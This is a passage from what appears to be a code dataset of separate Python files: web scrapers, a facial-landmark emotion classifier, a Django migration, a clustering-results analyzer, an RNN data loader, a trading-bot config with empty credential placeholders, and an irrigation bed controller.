in url_list:\n news_url = h.find(class_=\"entry-title mh-posts-list-title\").find(\"a\").get(\"href\")\n yield scrapy.Request(news_url,callback=self.parse_news,meta=meta)\n pub_time = soup.select(\"#main-content > article\")[-1].find(class_=\"mh-meta-date updated\").text\n if self.time == None or Util.format_time3(Util.format_time2(pub_time)) >= 
int(self.time):\n            yield scrapy.Request(soup.select('a.next.page-numbers')[0].attrs['href'], callback=self.parse)\n        else:\n            self.logger.info('time cutoff reached')\n\n    def parse_news(self,response):\n        item = NewsItem()\n        soup = bs(response.text,\"html.parser\")\n        item[\"category1\"] = response.meta[\"category1\"]\n        item[\"category2\"] = response.meta[\"category2\"]\n        pub_time = soup.find(\"span\",\"entry-meta-date updated\").find(\"a\").text.strip() if soup.find(\"span\",\"entry-meta-date updated\") else \"0000-00-00 00:00:00\"\n        if pub_time:\n            item[\"pub_time\"] = Util.format_time2(pub_time)\n\n        div = soup.find(\"div\",class_=\"entry-content clearfix\")\n        images = [img.get(\"src\") for img in div.find_all(\"img\")] if div.find_all(\"img\") else None\n        item[\"images\"] = images\n        title = soup.find(\"h1\",class_=\"entry-title\").text.strip()\n        item[\"title\"] = title\n        abstract1 = [a.text.strip() for a in div.find_all(\"li\")] if div.find_all(\"li\") else div.find(\"p\").text.strip()\n        abstract = ''\n        for a in abstract1:\n            abstract += a\n        item[\"abstract\"] = abstract\n        body = [p.text.strip() for p in div.find_all(\"p\")] if div.find_all(\"p\") else []\n        body = \"\\n\".join(body)\n        item[\"body\"] = body\n        yield item\n","sub_path":"crawler/v1/kickerdaily.py","file_name":"kickerdaily.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"537824256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 15 11:03:35 2019\n\n\"\"\"\n\n#IMPORTS\nfrom imutils import face_utils\nimport imutils\nimport dlib\nimport cv2\nimport os\nfrom sklearn.linear_model import LogisticRegression\nimport pickle\nimport shutil\n\n\nparam = [] \nresult = []\n\n\n#FUNCTIONS\ndef face_detection(rects):\n    \"\"\"\n    \"\"\"\n    for (i, rect) in enumerate(rects):\n        #Retrieve the facial landmark points and store them in a list\n        shape = predictor(gray, rect)\n        shape = face_utils.shape_to_np(shape)\n        \n        features = []\n        features.append(dist_between_eyebrow(shape))\n        features.append(dist_corner_eye_right(shape))\n        features.append(dist_corner_eye_left(shape))\n        features.append(dist_eyebrow_eye_right(shape))\n        features.append(dist_eyebrow_eye_left(shape))\n        features.append(dist_open_eye_right(shape))\n        features.append(dist_open_eye_left(shape))\n        features.append(dist_nose_width(shape))\n        features.append(dist_nose_height(shape))\n        features.append(dist_mouth(shape))\n        features.append(dist_min_mouth(shape))\n        features.append(dist_mouth_width(shape))\n        features.append(dist_mouth_cheeks_right(shape))\n        features.append(dist_mouth_cheeks_left(shape))\n        features.append(dist_mouth_corner(shape))\n\n        param.append(features)\n\n\n# EYES\ndef dist_between_eyebrow(shape):\n    den = abs(float(shape[16][0] - shape[0][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[22][0] - shape[21][0])) / den\n    return dist\n\ndef dist_corner_eye_right(shape):\n    den = abs(float(shape[15][1] - shape[22][1]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[42][1] - shape[22][1])) / den\n    return dist\n\n\ndef dist_corner_eye_left(shape):\n    den = abs(float(shape[1][1] - shape[21][1]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[39][1] - shape[21][1])) / den\n    return dist\n\n\ndef dist_eyebrow_eye_right(shape):\n    den = abs(float(shape[41][1] - shape[19][1]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[37][1] - shape[19][1])) / den\n    return dist\n\n\ndef dist_eyebrow_eye_left(shape):\n    den = abs(float(shape[46][1] - shape[24][1]))\n    if den == 0:\n        den = 0.1\n    
dist = abs(float(shape[44][1] - shape[24][1])) / den\n    return dist\n\n\ndef dist_open_eye_right(shape):\n    den = abs(float(shape[45][0] - shape[42][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[47][1] - shape[43][1])) / den\n    return dist\n\n\ndef dist_open_eye_left(shape):\n    den = abs(float(shape[39][0] - shape[36][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[40][1] - shape[38][1])) / den\n    return dist\n\n\n# NOSE\ndef dist_nose_width(shape):\n    den = abs(float(shape[14][0] - shape[2][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[35][0] - shape[31][0])) / den\n    return dist\n\n\ndef dist_nose_height(shape):\n    den = abs(float(shape[6][1] - shape[27][1]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[31][1] - shape[27][1])) / den\n    return dist\n\n\n# MOUTH\ndef dist_mouth(shape):\n    width = abs(shape[54][0] - shape[48][0])\n    height = abs(shape[57][1] - shape[51][1])\n    if height == 0:\n        height = 0.1\n\n    dist = float(width) / float(height)\n    return dist\n\n\ndef dist_min_mouth(shape):\n    width = abs(shape[54][0] - shape[48][0])\n    height = abs(shape[66][1] - shape[62][1])\n    if height == 0:\n        height = 0.1\n\n    dist = float(width) / float(height)\n    return dist\n\n\ndef dist_mouth_width(shape):\n    den = abs(float(shape[13][0] - shape[3][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[54][0] - shape[48][0])) / den\n    return dist\n\n\ndef dist_mouth_cheeks_right(shape):\n    den = abs(float(shape[13][0] - shape[3][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[13][0] - shape[54][0])) / den\n    return dist\n\n\ndef dist_mouth_cheeks_left(shape):\n    den = abs(float(shape[13][0] - shape[3][0]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[48][0] - shape[3][0])) / den\n    return dist\n\n\ndef dist_mouth_corner(shape):\n    den = abs(float(shape[8][1] - shape[51][1]))\n    if den == 0:\n        den = 0.1\n    dist = abs(float(shape[54][1] - shape[51][1])) / den\n    return dist\n\n\n#MAIN\nif __name__ == \"__main__\":\n\n    # INIT DLIB DETECTOR: face and facial landmarks\n    detector = dlib.get_frontal_face_detector()\n    predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n    \n    \n    #Loop over the images for the different emotions\n    for folder in os.listdir(\"learning_images\"):\n        for img in os.listdir(\"learning_images/\" + folder):\n            # Load the image, resize it and convert it to grayscale\n            image = cv2.imread(\"learning_images/\" + folder + \"/\" + img)\n            image = imutils.resize(image, width=500)\n            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n            \n            # Face detection\n            rects = detector(gray, 1)\n            face_detection(rects)\n            result.append(folder)\n    \n    logreg = LogisticRegression(C=1e5, max_iter= 20000,solver='sag', multi_class='multinomial')\n    logreg.fit(param, result)\n    \n    #Save the model\n    filename = \"learning_save.sav\"\n    pickle.dump(logreg, open(filename, 'wb'))\n    \n    \n    \n\n\n","sub_path":"face_learning/face_learning.py","file_name":"face_learning.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"472990256","text":"# !/usr/bin/python\n# coding:utf-8\n# Classify running script (行書), clerical script (隸書) and regular script (楷書)\n\nimport shutil, os\n\npath = '/Users/wei-chilan/Documents/python/ziWebCrawler/imgs'\nTargetFolder = '/Users/wei-chilan/Documents/python/ziWebCrawler/other'\nlist = os.listdir(path)\nfor filename in list:\n    if not any(s in filename for s in (\"行書\", \"隸書\", \"楷書\")):\n        print(filename)\n        SourceFolder = os.path.join(path , filename)\n        shutil.move(SourceFolder, 
TargetFolder)\n\n","sub_path":"classificateZi.py","file_name":"classificateZi.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496128816","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0002_convenetime'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='convenetime',\n name='chamber',\n field=models.OneToOneField(related_name='time_for', to='legislators.Chamber'),\n preserve_default=True,\n ),\n ]\n","sub_path":"txlege84/core/migrations/0003_auto_20150114_0126.py","file_name":"0003_auto_20150114_0126.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"355522339","text":"import collections\n\nfrom tqdm import tqdm\n\nfrom adapter import synthetic_dataset_adapter\nfrom config import constants\nfrom config.bdsa_config import _config_\nfrom config.constants import CLUSTER_ID\nfrom model import dataset\nfrom pipeline.pipeline_abstract import AbstractPipeline\nfrom pipeline.pipeline_common import analyze_clustering_results, ClusteringOutput\nfrom utils import string_utils, stats_utils, io_utils, experiment_utils, plot_utils\n\nISOLATED_ANALYSIS = 'Isolated Analysis'\n\nGLOBAL = 'Global'\n\nSA_MEASURES = 'Schema alignment measures'\nPAGE_MEASURES = 'Page linkage measures'\n\nF_MEASURE = 'F1'\nRECALL = 'R'\nPRECISION = 'P'\n\n\"\"\"\nCompute some statistics on schema alignment results, and outputs it in a readable way\n\"\"\"\n\nINTRA_EDGE = 'INTRA_EDGE'\nEXTRA_EDGE = 'EXTRA_EDGE'\nNODE = 'NODE'\n\nTYPE = 'type'\n\nWEIGHT = 'weight'\n\nNAME_2 = 'name2'\n\nSOURCE_NAME = 'source'\nSOURCE_2_NAME = 'source2'\n\nCLUSTER2_ID = 'cluster2'\n\nOCCURRENCES = 'occurrences'\nCARDINALITY = 'cardinality'\n\nCLUSTER_SIZE = 'cluster_size'\n\nTOP_3 = 'Top3'\nTOP_2 = 'Top2'\nTOP_1 = 'Top1'\n\nFILENAME_GRAPH_BUILT_CACHE = \"bdsa_output\"\n\nclass PipelineAnalyzer(AbstractPipeline):\n def __init__(self, tag_input):\n self._tag = tag_input\n\n def run(self, data: tuple):\n output = data[0]\n debug_stats = data[1]\n for cat, cat_data in output.items():\n stats = self.compute_stats_on_graph(cat_data, cat)\n if cat in debug_stats:\n stats.update(debug_stats[cat])\n if _config_.do_output_main_analysis():\n ds_synthesis, ds_details = self.get_clustering_results(cat_data)\n ds_synthesis.export_to_csv(_config_.get_analysis_output_dir(), \"%s_%s_%s\" % ('cluster_synthesis', self._tag, cat),\n True)\n ds_details.export_to_csv(_config_.get_analysis_output_dir(), \"%s_%s_%s\" % ('cluster_detail', self._tag, cat),\n True)\n io_utils.output_json_file(stats, \"%s_%s_%s\" % (FILENAME_GRAPH_BUILT_CACHE, self._tag, cat))\n\n def name(self):\n return \"Analyzer\"\n\n def need_input(self):\n return True\n\n def need_output(self):\n return False\n\n def compute_stats_on_graph(self, clustering_output: ClusteringOutput, category):\n stats = analyze_clustering_results(clustering_output)\n if _config_.do_synthetic_evaluation():\n self.compute_evaluation(stats, clustering_output)\n\n isolated = dataset.Dataset()\n for sa, row in clustering_output.sa_isolated.items():\n row['SA'] = sa\n isolated.add_row(row)\n isolated.export_to_csv(_config_.get_analysis_output_dir(), 'Isolated_%s' % category, with_timestamp=True)\n\n #isolated nodes are excluded from count\n att_cluster_sizes = [sum(len(sas) 
for sas in source2sas.values()) for source2sas in\n clustering_output.sa_clusters.values()]\n pages_cluster_sizes = [sum(len(pages) for pages in source2pages.values()) for source2pages in\n clustering_output.page_clusters.values()]\n\n if _config_.debug_mode():\n stats[ISOLATED_ANALYSIS] = self.analyze_isolated(clustering_output)\n stats['Linkage differencies'] = self.analyze_linkage_changes(clustering_output)\n stats[constants.STATS_ATTR_CLUSTER_SIZES] = stats_utils.GroupSize(att_cluster_sizes).__dict__\n stats[constants.STATS_PAGE_CLUSTER_SIZES] = stats_utils.GroupSize(pages_cluster_sizes).__dict__\n return stats\n\n def analyze_linkage_changes(self, clustering_output: ClusteringOutput):\n \"\"\"\n Analyze how the linkage changed after iterative linkage-alignment\n :return: \n \"\"\"\n old_linkage = collections.defaultdict(set)\n new_linkage_clusters = []\n old_isolated = []\n for source2pages in clustering_output.page_clusters.values():\n pages_pid_flattened = [page for pages in source2pages.values() for page in pages]\n new_linkage_clusters.append(pages_pid_flattened)\n for page in pages_pid_flattened:\n pids = clustering_output.old_url2pid.get(page.url, [])\n for pid in pids:\n old_linkage[pid].add(page)\n if len(pids) == 0:\n #add to isolated cluster\n old_isolated.append([page])\n for page in clustering_output.page_isolated:\n new_linkage_clusters.append([page])\n #TODO duplicated code\n pids = clustering_output.old_url2pid.get(page.url, [])\n for pid in pids:\n old_linkage[pid].add(page)\n if len(pids) == 0:\n # add to isolated cluster\n old_isolated.append([page])\n old_linkage_clusters = list(old_linkage.values())\n old_linkage_clusters.extend(old_isolated)\n new_link, old_link, union_link = experiment_utils.evaluate_expected_computed({}, new_linkage_clusters, old_linkage_clusters)[3:6]\n return {'TOTAL LINKAGES NOW':new_link, 'TOTAL old linkages': old_link, 'Linkages kept': union_link,\n 'New linkages created': new_link - union_link, 'Linkages deleted': old_link - union_link}\n\n def analyze_isolated(self, clustering_output: ClusteringOutput):\n \"\"\"\n Make some analysis on isolated sa/pages\n In particular classify sources according to isolated elements\n :return: \n \"\"\"\n print (\"Analyze isolated elements...\")\n source2sa_isolated = collections.defaultdict(int)\n source2sa_non_isolated = collections.defaultdict(int)\n source2page_isolated = collections.defaultdict(int)\n source2page_non_isolated = collections.defaultdict(int)\n all_sources = set()\n for source2sas in clustering_output.sa_clusters.values():\n for source, sas in source2sas.items():\n all_sources.add(source)\n source2sa_non_isolated[source] += len(sas)\n for sa in clustering_output.sa_isolated.keys():\n source2sa_isolated[sa.source] += 1\n all_sources.add(sa.source)\n for source2pages in clustering_output.page_clusters.values():\n for source, pages in source2pages.items():\n source2page_non_isolated[source] += len(pages)\n all_sources.add(source)\n for page in clustering_output.page_isolated:\n source2page_isolated[page.source] += 1\n all_sources.add(page.source)\n source2perc_sa_isolated = {}\n source2perc_page_isolated = {}\n source2size = {}\n alert_sources = set()\n for source in all_sources:\n nb_sa_isolated = source2sa_isolated.get(source, 0)\n nb_sa_non_isolated = source2sa_non_isolated.get(source, 0)\n nb_pages_isolated = source2page_isolated.get(source, 0)\n nb_pages_non_isolated = source2page_non_isolated.get(source, 0)\n total_nb_attributes = nb_sa_isolated + nb_sa_non_isolated\n total_nb_pages 
= nb_pages_isolated + nb_pages_non_isolated\n\n if total_nb_attributes == 0 or total_nb_pages == 0:\n raise Exception(\"The following source has no attribute or no pages, check input: %s\"%(str(source)))\n isolated_perc = nb_sa_isolated / float(total_nb_attributes) * 100\n source2perc_sa_isolated[source] = isolated_perc\n pages_isolated_perc = nb_pages_isolated / float(total_nb_pages) * 100\n source2perc_page_isolated[source] = pages_isolated_perc\n source2size[source] = total_nb_pages\n if pages_isolated_perc > 90 and isolated_perc > 90:\n alert_sources.add(str(source))\n #Now add %isolation info to isolated sa\n for sa, data in clustering_output.sa_isolated.items():\n data['PERC_ISOLATED_SA_SOURCE'] = source2perc_sa_isolated[sa.source]\n data['PERC_ISOLATED_PAGES_SOURCE'] = source2perc_page_isolated[sa.source]\n nb_sources = {}\n sum_sources_size = {}\n #Prepare data for plot\n for sa_axis in range(0,120,20):\n for page_axis in range(0,120,20):\n all_corresponding_sources = set(source for source, perc in source2perc_sa_isolated.items() if\n sa_axis <= perc and perc < sa_axis + 20) & set(\n source for source, perc in source2perc_page_isolated.items() if\n page_axis <= perc and perc < page_axis + 20)\n nb_sources[(sa_axis,page_axis)] = len(all_corresponding_sources)\n sum_sources_size[(sa_axis,page_axis)] = sum(source2size[source] for source in all_corresponding_sources)\n plot_utils.make_colormap(nb_sources, 'Isolated sources', 'Attributes isolated', 'Clusters isolated')\n plot_utils.make_colormap(sum_sources_size, 'Size of isolated sources', 'Attributes isolated', 'Clusters isolated')\n return list(alert_sources)\n\n\n def compute_evaluation(self, stats, clustering_output: ClusteringOutput):\n ## TODO those lines are specific to the type of input (synth/real)\n expected_sa_clusters, computed_sa_clusters = synthetic_dataset_adapter.golden_set_for_synthetic_data(\n clustering_output.sa_clusters, clustering_output.sa_isolated,\n lambda sa: sa.attname, lambda sa: synthetic_dataset_adapter.SyntheticSourceAttribute(sa))\n\n expected_page_clusters, computed_page_clusters = synthetic_dataset_adapter.golden_set_for_synthetic_data(\n clustering_output.page_clusters, clustering_output.page_isolated,\n lambda page: page.pid, lambda page: synthetic_dataset_adapter.SyntheticPage(page))\n\n source_categories = {'H_Source': lambda x: x.synth_source.ht == 'H', 'T_Source': lambda x: x.synth_source.ht == 'T',\n 'Missing linkage > 0.5': lambda x: x.synth_source.linkage_missing > 0.5,\n 'Missing linkage < 0.5': lambda x: x.synth_source.linkage_missing < 0.5,\n 'Linkage error 0.1': lambda x: x.synth_source.linkage_error == 0.1,\n 'Linkage error 0.01': lambda x: x.synth_source.linkage_error == 0.01,\n 'Value error 0.1': lambda x: x.synth_source.value_error == 0.1,\n 'Value error 0.01': lambda x: x.synth_source.value_error == 0.01\n }\n\n sa_categories = dict(source_categories)\n sa_categories.update({\n 'H_Attributes': lambda x: x.att_ht == 'H', 'T_Attributes': lambda x: x.att_ht == 'T',\n 'Card2': lambda x: x.cardinality == 2, 'Card3': lambda x: x.cardinality == 3,\n 'Card7': lambda x: x.cardinality == 7, 'Card10': lambda x: x.cardinality == 10,\n 'Card10+': lambda x: x.cardinality > 10\n })\n global_sa_results, specific_sa_results = experiment_utils.evaluate_dataset(computed_sa_clusters, expected_sa_clusters.values(),\n sa_categories)\n global_page_results, specific_page_results = experiment_utils.evaluate_dataset(computed_page_clusters, expected_page_clusters.values(),\n source_categories)\n 
stats[SA_MEASURES] = {}\n stats[SA_MEASURES][GLOBAL] = {PRECISION: global_sa_results.precision, RECALL: global_sa_results.recall,\n F_MEASURE: global_sa_results.f_measure}\n for cat, results in specific_sa_results.items():\n stats[SA_MEASURES][cat] = {PRECISION: results.precision, RECALL: results.recall,\n F_MEASURE: results.f_measure}\n\n stats[PAGE_MEASURES] = {}\n stats[PAGE_MEASURES][GLOBAL] = {PRECISION: global_page_results.precision, RECALL: global_page_results.recall,\n F_MEASURE: global_page_results.f_measure}\n for cat, results in specific_page_results.items():\n stats[PAGE_MEASURES][cat] = {PRECISION: results.precision, RECALL: results.recall,\n F_MEASURE: results.f_measure}\n\n def get_clustering_results(self, clustering_output: ClusteringOutput):\n \"\"\"\n Outputs 2 csv files representing the algorithm output\n * \"cluster synthesis\": a list of clusters, each with ID, number of attributes and most frequent attribute names\n * \"cluster details\": a list of attributes, each with cluster ID it belongs and most frequent attribute values\n :return:\n \"\"\"\n\n synhtesis = dataset.Dataset([constants.CLUSTER_ID, OCCURRENCES, TOP_1, TOP_2, TOP_3])\n details = dataset.Dataset([constants.CLUSTER_ID, CLUSTER_SIZE, SOURCE_NAME, constants.NAME, CARDINALITY, OCCURRENCES])\n\n for pid, source2sas in tqdm(clustering_output.sa_clusters.items(), desc='Build cluster output'):\n elements = [sa for sas in source2sas.values() for sa in sas]\n # for each cluster, find most common attribute names (but try to remove too similar names, see sort_attnames for details)\n attname2occs = stats_utils.count_elements(elements, lambda x: string_utils.folding_using_regex(x.name))\n att_name_sorted = self._sort_attnames(attname2occs)\n\n row = {CLUSTER_ID: pid, OCCURRENCES: len(elements), TOP_1: att_name_sorted[0], TOP_2: att_name_sorted[1],\n TOP_3: att_name_sorted[2]}\n synhtesis.add_row(row)\n for elem in elements:\n domain = clustering_output.sa_domain[elem]\n # now add rows to cluster details CSV.\n # For each attribute, find the 3 most frequent attribute values\n words = sorted(domain.items(), key = lambda x: x[1], reverse=True)[0:3]\n words.extend([''] * (3 - len(words))) #if <3 distinct values, we need to 'pad' the list\n row = {CLUSTER_ID: pid, CLUSTER_SIZE: len(elements), SOURCE_NAME: elem.source.site, constants.NAME : elem.name,\n CARDINALITY: len(domain),\n OCCURRENCES: sum(domain.values()),\n TOP_1: words[0], TOP_2: words[1], TOP_3: words[2]\n }\n details.add_row(row)\n return synhtesis, details\n\n def _sort_attnames(self, attname2occs, max_number_of_att_names = 3):\n \"\"\"\n Return the top 3 attribute names (most used in a cluster)\n Eliminate att names too similar to former ones (if we can find at least 3)\n Example: most frequent attribut names, sorted desc:\n --> max product size, size, product, max, viewfinder type, viewfinder, type\n --> OUTPUT: max product size, max, viewfinder type\n :param attname2occs: \n :param max_number_of_att_names: \n :return: \n \"\"\"\n att_name_sorted = sorted(attname2occs.keys(), key=lambda elem: attname2occs[elem], reverse=True)\n att_name_list = []\n att_name_removed = []\n i = 0\n while i < len(att_name_sorted) and len(att_name_list) < max_number_of_att_names:\n if any(att_name_sorted[i].split(' ') <= elem.split(' ') for elem in att_name_list):\n att_name_removed.append(att_name_sorted[i])\n else:\n att_name_list.append(att_name_sorted[i])\n i += 1\n att_name_list.extend(att_name_removed)\n return att_name_list[0:3] + [''] * (max_number_of_att_names - 
len(att_name_list))\n\n\n","sub_path":"pipeline/pipeline_analyzer.py","file_name":"pipeline_analyzer.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"540702852","text":"#KEEP ULTRA SAFE\n\nfrom random import seed\nfrom random import randint\n\nseed(10)\n\n# main\nBINANCE_KEY=\"\"\nBINANCE_SECRET=\"\"\n\n# overclocking mitigation.\n# create multiple API Instances and have them random loop through class below.\n# binance - Can you make these juggle?\nBINANCE_KEY_v1=\"\"\nBINANCE_SECRET_v1=\"\"\n\nBINANCE_KEY_v2=\"\"\nBINANCE_SECRET_v2=\"\"\n\nBINANCE_KEY_v3=\"\"\nBINANCE_SECRET_v3=\"\"\n\n\nBINANCE_KEY_v4=\"\"\nBINANCE_SECRET_v4=\"\"\n\n# unrestricted\nBINANCE_KEY_v5=\"\"\nBINANCE_SECRET_v5=\"\"\n\nBINANCE_KEY_v6=\"\"\nBINANCE_SECRET_v6=\"\"\n\nBINANCE_KEY_v7=\"\"\nBINANCE_SECRET_v7=\"\"\n\n\n# robinhood\nrh_username = \"\"\nrh_password = \"\"\n\n","sub_path":"Binance Trading Bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"276997553","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 15:14:26 2018\n\n@author: brookeerickson\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom requests import get\nimport re\n\n\n'''FUNCTION: GO THROUGH LIST OF TAGS AND ADD ALL LINKS TO A LIST\n OUTPUT: LIST OF HTML INFO ASSOCIATED WITH EACH TAG'''\ndef tags_by_date(TAGS, links, html_soup):\n    #first page: tag is of type class\n    tag_type,tag = TAGS[0]\n    links_page = html_soup.find_all(tag_type, class_ = tag) \n    for each in links_page:\n        links.append(each)\n    #second page: tag is of type id\n    tag_type,tag = TAGS[1]\n    links_page = html_soup.find_all(tag_type, id = tag) \n    for each in links_page:\n        links.append(each) \n    #links is a list after going through all pages\n    return links\n\n\n'''FUNCTION: FIND ALL ANCHOR TAGS IN EACH OBJECT OF LINKS\n INPUT: LINKS\n OUTPUT: PDF_LINKS, XLSX_LINKS, LINKS_VISITED, ALL_LINKS'''\ndef scrape_page(current, links, prefix_length, URL_PREFIX, pdf_links, xlsx_links, links_visited, all_links):\n    for each in links:\n        #find all anchor tags and url's\n        anchor_tags = each.find_all('a',href=True)\n        for link in anchor_tags:\n            if 'pdf' in link.text:\n                #if the text in the website for this link says pdf\n                pdf_url= link['href']\n                if pdf_url[:prefix_length] != URL_PREFIX:\n                    #append URL_PREFIX if necessary\n                    pdf_url = URL_PREFIX+str(pdf_url)\n                if pdf_url not in links_visited:\n                    #only use link if it has not already been visited\n                    links_visited.append(pdf_url)\n                    pdf_links.append(pdf_url)\n            else:\n                #if the text in the website for this link does not say pdf\n                url= link['href']\n                if url[:prefix_length] != URL_PREFIX:\n                    #append URL_PREFIX if necessary\n                    url = URL_PREFIX+str(url)\n                if url not in links_visited:\n                    #only use link if it has not already been visited\n                    links_visited.append(url)\n                    all_links.append(url)\n    if 'pdf' in current:\n        pdf_links.append(current)\n    elif 'xlsx' in current:\n        xlsx_links.append(current)\n    #remove current url from all_links and add to links_visited\n    all_links.remove(current)\n    links_visited.append(current)\n    return pdf_links, xlsx_links, links_visited, all_links\n\n\n'''FUNCTION: COMBINE ALL ABOVE FUNCTIONS FOR WEBSITE'S MAIN PAGE\n OUTPUT: list of pdf_links and xlsx_links'''\ndef one_page(prefix_length, URL_PREFIX, TAGS, all_links, pdf_links, xlsx_links, links_visited, PRINT_MODE):\n    #continue to 
repeat process while there are more links in the list all_links\n    while all_links:\n        current = all_links[0]\n        response = get(current)\n        html_soup = BeautifulSoup(response.text, 'lxml')\n        \n        links = tags_by_date(TAGS, [], html_soup)\n        \n        pdf_links, xlsx_links, links_visited, all_links = scrape_page(current, links, prefix_length, URL_PREFIX, pdf_links, xlsx_links, links_visited, all_links)\n        \n        if PRINT_MODE: \n            print ('all_links')\n            print (all_links)\n            print ('links_visited')\n            print (len(links_visited))\n            print (links_visited)\n            print ('pdf_links')\n            print (len(pdf_links))\n            for i in pdf_links:\n                print (i)\n            print ('xlsx_links')\n            print (len(xlsx_links))\n            for i in (xlsx_links):\n                print (i)\n    \n    return pdf_links, xlsx_links\n\n\n'''FUNCTION: SCRAPE THE WEBSITE'''\ndef scrape_website(URL, TAGS, pdf_links = [], xlsx_links = [], links_visited = [], PRINT_MODE=True):\n\n    URL_PREFIX = re.search('.*org/|.*com/|.*edu/',URL).group(0)\n    prefix_length = len(URL_PREFIX)\n    all_links = [URL]\n\n    pdf_links, xlsx_links = one_page(prefix_length, URL_PREFIX, TAGS, all_links, pdf_links, xlsx_links, links_visited, PRINT_MODE)\n    \n    return pdf_links, xlsx_links\n    \n#################################################################################\nURL = 'http://ggim.un.org/knowledgebase/'\nTAGS = [('div','i-panel-content'),('div','ctl00_ctlContentPlaceHolder_ctl00_ctl00_ctl00_ctl00_ctlPanelBar_ctlViewArticleAttachments_ctl00_ctlViewAttachments_ctl00_ctlDataList')]\n\npdf_links, xlsx_links = scrape_website(URL, TAGS)","sub_path":"autoidentification/specialized/WebScrapeGGIM.py","file_name":"WebScrapeGGIM.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"206765555","text":"import numpy as np\nfrom reader import enqueuer, get_vocab, Vocab\n\nclass InputData(object):\n    \"\"\"The input data.\"\"\"\n    def __init__(self, config, data, name=None):\n        # if testset:\n        # do something different for input_data and targets\n        # - We can discard targets and just look at relative ratios\n        self.vocab_size = config.vocab_size\n        self.batch_size = batch_size = config.batch_size\n        self.num_steps = num_steps = config.num_steps\n        self.epoch_size = ((len(data) // batch_size) - 1) // num_steps\n        self.input_data, self.targets = enqueuer(data, batch_size, num_steps, name=name)\n\n\nclass TestData(object):\n    \"\"\"The input data for tester\"\"\"\n    def __init__(self, config, test_data, test_meta, vocab, name=None):\n        data = test_data\n        max_seq_len = max([len(seq) for seq in data])\n        self.meta = test_meta\n        self.vocab = vocab\n        self.vocab_size = config.vocab_size\n        self.num_steps = max_seq_len - 1\n        self.batch_size = len(data)\n        self.epoch_size = 1\n        test_inp = np.zeros((self.batch_size, self.num_steps), dtype=int) + vocab.getid(vocab.eos)\n        test_targ = np.zeros((self.batch_size, self.num_steps), dtype=int) + vocab.getid(vocab.eos)\n\n        for irow, trow, seq in zip(test_inp, test_targ, data):\n            irow[0:len(seq)-1] = np.array(seq[0:-1]).astype(int)\n            trow[0:len(seq)-1] = np.array(seq[1:]).astype(int)\n        self.input_data = test_inp\n        self.targets = test_targ\n\ndef main():\n    import reader as reader\n    from trainer import Configs\n    from PDPATH import PDPATH\n\n    ptb_vocab = get_vocab('ptb.voc')\n    raw_test_data = reader.make_test(PDPATH('/RNN/test_data/coffee.txt'), ptb_vocab)\n\n    test_input = TestData(config=Configs(),\n                          test_data=raw_test_data,\n                          test_meta=None,\n                          vocab=ptb_vocab,\n                          name=\"TestInput\")\n\n\nif __name__=='__main__': 
main()","sub_path":"classes/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"103616596","text":"\n# create object for each bed and try to develop some logic for the beds to know\n# where they can draw or dump to\n\nclass Bed:\n def __init__(self, column, row):\n self.col = column\n self.row = row\n self.target = None\n self.target_min = -1\n self.target_max = -1\n self.water_level = -1\n self.valve_status = None\n self.capacity = -1\n # self.target = 'Fill'\n # self.target_min = 20\n # self.target_max = 30\n # self.water_level = 0\n # self.valve_status = 'close'\n # self.capacity = 100\n # whether or not the bed is at the right level\n self.happy = False\n\n def __str__(self):\n # return(f\"{self.row}{self.col}, Level:{self.current_level}, Targ:{self.target}, Valve:{self.valve_status}, Happy:{self.happy}\")\n return \"{}{}: Level:{}, Targ:{}, FillMin:{}, Valve:{}, Happy:{}\" \\\n .format(self.col, self.row, self.water_level, self.target, self.target_min, self.valve_status, self.isHappy())\n\n def setValve(self, state, client, user):\n # if valve was asked to open and is currently closed\n if state == 'open' and self.valve_status == 'close':\n client.publish(f\"{user}/bed-{self.row}{self.col}/valve/set\", 'open')\n # if valve was asked to close and is currently open\n elif state == 'close' and self.valve_status == 'open':\n client.publish(f\"{user}/bed-{self.row}{self.col}/valve/set\", 'close')\n\n # returns if bed has correct level\n def isHappy(self):\n return ((self.target == 'Fill') and (self.water_level > self.target_min)) or \\\n ((self.target == 'Empty') and (self.water_level == 